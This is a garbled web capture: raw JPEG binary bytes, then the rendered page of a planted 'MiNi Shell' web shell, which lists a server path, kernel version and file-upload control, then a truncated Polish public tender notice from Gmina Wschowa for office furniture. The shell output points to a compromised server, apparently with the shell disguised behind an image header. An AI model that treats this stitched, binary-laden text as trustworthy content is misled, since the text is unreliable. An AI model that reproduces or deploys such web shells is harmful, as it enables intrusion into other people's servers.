JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250702/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250702/0030513301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wyposażenia do adaptowanych pomieszczeń biurowych w budynku przy ulicy Łaziennej we Wschowie- II postępowanie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wschowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050787</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wschowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wschowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.gminawschowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wyposażenia do adaptowanych pomieszczeń biurowych w budynku przy ulicy Łaziennej we Wschowie- II postępowanie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-719bf462-68ae-4793-bab7-b1846e912691</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00305133</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045407/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa wyposażenia do adaptowanych pomieszczeń biurowych w budynku przy ulicy Łaziennej we Wschowie - II postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1135923 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1135923</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozporządzeniem Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie(Dz. U. 2020 poz. 2452)określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl,tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;komputer klasy<br/>PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;zainstalowana dowolna przeglądarka internetowa;<br/>Uwaga! od dnia 17 sierpnia2021r., ze względu na zakończenie wspierania przeglądarki Internet Explorer przez firmę Microsoft,<br/>stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne;włączona obsługa JavaScript;zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf;szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu<br/>TLS1.3.;oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)generowany wg.<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar;Zamawiający nie ponosi odpowiedzialności za<br/>złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający<br/>zapozna się z treścią oferty przed upływem terminu składania ofert(np.złożenie oferty w zakładce „Wyślij wiadomość do<br/>zamawiającego”).Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art.221 Ustawy Prawo Zamówień<br/>Publicznych.Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>Rozporządzeniem Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na.pdf .W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a).zip ;b).7Z; Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar .gif .bmp .numbers<br/>.pages.Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.Zamawiający zwraca uwagę na ograniczenia<br/>wielkości plików podpisywanych profilem zaufanym, który wynosi max10MB, oraz na ograniczenie wielkości plików podpisywanych<br/>w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB.Ze względu na niskie ryzyko naruszenia<br/>integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików<br/>składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż PDF zaleca<br/>się opatrzyć zewnętrznym podpisem XAdES.<br/>Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać„Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych<br/>na rynku wewnętrznym(eIDAS)9UE) nr 910/2014od 1.07.2016r. Pozostałe zapisy dot. wymagań technicznych i organizacyjnych<br/>zawarto w Rozdziale VIII i XI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych jest Urząd Miasta i Gminy Wschowa. Adres i dane kontaktowe administratora danych: Urząd<br/>Miasta i Gminy Wschowa, Rynek 1, 67-400 Wschowa, tel.: 65 5408600, e-mail: boi@wschowa.pl.<br/>2) W sprawach dotyczących przetwarzania danych osobowych, w tym realizacji praw związanych z przetwarzaniem danych, można<br/>się skontaktować z wyznaczonym inspektorem ochrony danych (IOD) w następujący sposób: poczta elektroniczna<br/>kontakt@rodoleszno.com.pl.; tel.: 783 479791 lub pisemnie na adres naszej siedziby. Dane osobowe będą przetwarzane w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego: „Dostawa wyposażenia do adaptowanych pomieszczeń<br/>biurowych w budynku przy ulicy Łaziennej we Wschowie”, znak sprawy: BI.271.16.2025.Podstawa prawna: - ustawa z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (t.j.Dz.U. z 2024 r. poz. 1320)<br/>- ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz.U. z 2024 r. poz. 1530, ze zm.),- ustawa z dnia 23 kwietnia 1964 r. Kodeks cywilny (t.j. Dz.U. z 2024r. poz. 1061, ze zm.),- art. 6 ust. 1 lit. c) RODO Rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE.3) Odbiorcami danych osobowych mogą być inni<br/>wykonawcy biorący udział w postępowaniu. Dane osobowe mogą być przekazane podmiotom i osobom, które uprawnione są do ich<br/>otrzymania przepisami prawa. Ponadto mogą być one ujawnione podmiotom, z którymi administrator danych zawarł umowę na<br/>świadczenie usług, w ramach których odbywa się przetwarzanie danych osobowych. Odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74, 75, 76 ustawy<br/>Prawo zamówień publicznych.<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Zarchiwizowane dane osobowe będą przechowywane przez okres zgodny z obowiązującymi przepisami<br/>archiwalnymi, tj. m.in. ustawą z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach oraz rozporządzeniem Prezesa Rady<br/>Ministrów z 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie<br/>organizacji i zakresu działania archiwów zakładowych. 5) Przysługuje Pani/Panu prawo do:<br/>-dostępu do swoich danych oraz otrzymania ich kopii; prawo do sprostowania (poprawiania) swoich danych; -prawo do usunięcia<br/>danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa lub w ramach sprawowania władzy publicznej;-ograniczenia przetwarzania danych osobowych, przy czym przepisy odrębne<br/>mogą wyłączyć możliwość skorzystania z tego prawa; wniesienia sprzeciwu wobec przetwarzania danych osobowych. 6) Podanie<br/>danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi przepis prawa. Konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp. 7)Przy przetwarzaniu danych osobowych nie będzie używane<br/>zautomatyzowane podejmowanie decyzji ani profilowanie. Pozostałe informacje dot. RODO zawiera Rozdział XXI SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania przepisów RODO, o których mowa<br/>w art.19 ust 2 i 3 ustawy Pzp, a mianowicie:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.16<br/>RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>b) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art.18 ust.1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania. Zgodnie z art.22 RODO Posiada<br/>Pani/Pan prawo:<br/>- na podstawie art.15 RODO dostępu do danych osobowych Pani/Pana dotyczących(w przypadku korzystania przez osobę, której<br/>dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art.15 ust 1-3 RODO, Zamawiający może<br/>żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia);<br/>- na podstawie art.16 RODO do sprostowania Pani/Pana danych osobowych (skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.16 RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu postępowania i jego załączników);<br/>- na podstawie art.18 RODO żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art.18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii lub państwa członkowskiego). W przypadku gdy wniesienie<br/>żądania dotyczącego prawa, o którym mowa w art.18 ust.1 RODO, spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie<br/>zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO.<br/>Udostępnianie, o którym mowa w ust. 1 i 2 Rozdział XXI SWZ, ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>danych, o których mowa w art.9 ust.1 RODO, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady<br/>jawności, o których mowa w ust.3 i art.18 ust. 3-6, stosuje się odpowiednio. W związku z jawnością postępowania o udzielenie<br/>zamówienia publicznego dane mogą być przekazane do państw spoza Europejskiego Obszaru Gospodarczego, z zastrzeżeniem<br/>przypadków uzasadnionych ochroną prywatności zgodnie z art. 8 ust. 4 pkt 1,2 ustawy Pzp.Zamawiający przetwarza dane osobowe<br/>zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.Nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. c RODO.W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO. Pozostałe informacje dot. RODO zawiera Rozdział XXI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.19.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa wyposażenia do adaptowanych pomieszczeń biurowych w budynku przy ulicy<br/>Łaziennej we Wschowie, tj.:<br/>1) Biurko 16 szt.;<br/>2) Biurko (niestandardowe)- 4 szt.<br/>3) Krzesło biurowe 20 szt.;<br/>4) Szafa biurowa 45x70 cm - 2 szt.<br/>5) Szafa biurowa 45x80 cm- 3 szt.<br/>6) Szafa biurowa 45x90 cm- 8 szt.<br/>7) Szafa biurowa 45x120 cm- 28 szt.<br/>8) Szafa biurowa 45x75 cm- 1 szt.<br/>9) Szafa biurowa 45x85 cm- 1 szt.<br/>10)Stół konferencyjny- 1 szt.<br/>11)Krzesło konferencyjne- 10 szt.<br/>12)Wieszak ścienny z ośmioma (8) haczykami- 2 szt.<br/>13)Wieszak ścienny z czterema (4) haczykami- 4 szt.<br/>14)Wieszak ścienny z dwoma (2) haczykami- 4 szt.<br/>15)Dostawka do biurka, półokrągła- 1 szt.<br/>16)Dostawka do biurka, prostokątna- 2 szt.<br/>17)Szafa gospodarcza- 1 szt.<br/>18)Blat kuchenny z szafkami- 1 szt.<br/>19)Blat kuchenny- 1 szt.<br/>20)Szafka z blatem- 1 szt.<br/>21)Krzesło składane- 2 szt.<br/>22)Lodówka podblatowa (dostosowana do zamontowania pod blatem kuchennym- poz. 19 OPZ).<br/>2.Szczegółowy opis przedmiotu zamówienia, warunki jego realizacji przedstawia:<br/>1) Szczegółowy opis przedmiotu zamówienia (OPZ)- załącznik nr 2 do SWZ;<br/>2) Rzut pomieszczeń obrazujący zaplanowany rozkład wyposażenia- załącznik 2a do SWZ;<br/>3) Projekt umowy- załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39100000-3 - Meble</p> <p class="mb-0">39130000-2 - Meble biurowe</p> <p class="mb-0">39113000-7 - Różne siedziska i krzesła</p> <p class="mb-0">39113100-8 - Fotele</p> <p class="mb-0">39111000-3 - Siedziska</p> <p class="mb-0">39111100-4 - Siedziska obrotowe</p> <p class="mb-0">39112000-0 - Krzesła</p> <p class="mb-0">39121000-6 - Biurka i stoły</p> <p class="mb-0">39141300-5 - Szafy</p> <p class="mb-0">39131000-9 - Regały biurowe</p> <p class="mb-0">39121100-7 - Biurka</p> <p class="mb-0">39151300-8 - Meble modułowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny<br/>ofert, odnoszących się do przedmiotu zamówienia. Zamawiający, dokona wyboru oferty najkorzystniejszej w oparciu o następujące<br/>kryteria oceny ofert:<br/>1) Cena ofertowa brutto (PC) – waga kryterium to 60 pkt.<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w formularzu ofertowym (Załączniki<br/>nr 1 do SWZ). Maksymalną liczę punktów w tym kryterium otrzyma oferta z najniższą ceną ofertową (60 pkt). Oferty zostaną<br/>ocenione wg następującego wzoru:<br/>PC = Cn/Cb x 60 [pkt]<br/>Pc – oznacza punkty w kryterium „cena ofertowa brutto”,<br/>Cn – oznacza najniższą oferowaną cenę brutto spośród ofert niepodlegających odrzuceniu,<br/>Cb – oznacza cenę brutto badanej oferty.<br/>2) Gwarancja jakości i rękojmi (PG) – waga kryterium to 40 pkt.<br/>W przedmiotowym kryterium oceniany będzie podany przez Wykonawcą w formularzu ofertowym (Załączniki nr 1 do SWZ) okres<br/>gwarancji jakości i rękojmi na zaoferowane wyposażenie. Okres gwarancji jakości i rękojmi Wykonawca winien podać w miesiącach.<br/>Okres gwarancji i rękojmi liczony będzie od daty sporządzenia protokołu zdawczo - odbiorczego.<br/>Punkty przyznawane będą wg zasad opisanych poniżej:<br/>Zadeklarowana długość gwarancji przez Wykonawcę dla oferowanych urządzeń:<br/>- 24 miesięcznej gwarancji jakości i rękojmi od momentu protokolarnego odbioru przedmiotu zamówienia - ilość przyznanych<br/>punktów: 0 pkt.<br/>- 36 miesięcznej gwarancji jakości i rękojmi od momentu protokolarnego odbioru przedmiotu zamówienia- ilość przyznanych<br/>punktów: 20 pkt.<br/>- 48 miesięcznej gwarancji jakości i rękojmi od momentu protokolarnego odbioru przedmiotu zamówienia- ilość przyznanych<br/>punktów: 40 pkt.<br/>2. Nie dopuszcza się podania w ofercie okresu gwarancji jakości i rękojmi innego niż odpowiednio: 24, 36 lub 48 miesięcy.<br/>3. W przypadku podania okresu gwarancji i rękojmi krótszego niż 24 miesiące Zamawiający na podstawie art. podstawie art. 226 ust.<br/>1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji<br/>Warunków Zamówienia.<br/>4. W przypadku podania okresu gwarancji jakości i rękojmi dłuższego niż 48 miesięcy Zamawiający dla potrzeb obliczenia punktacji<br/>w kryterium 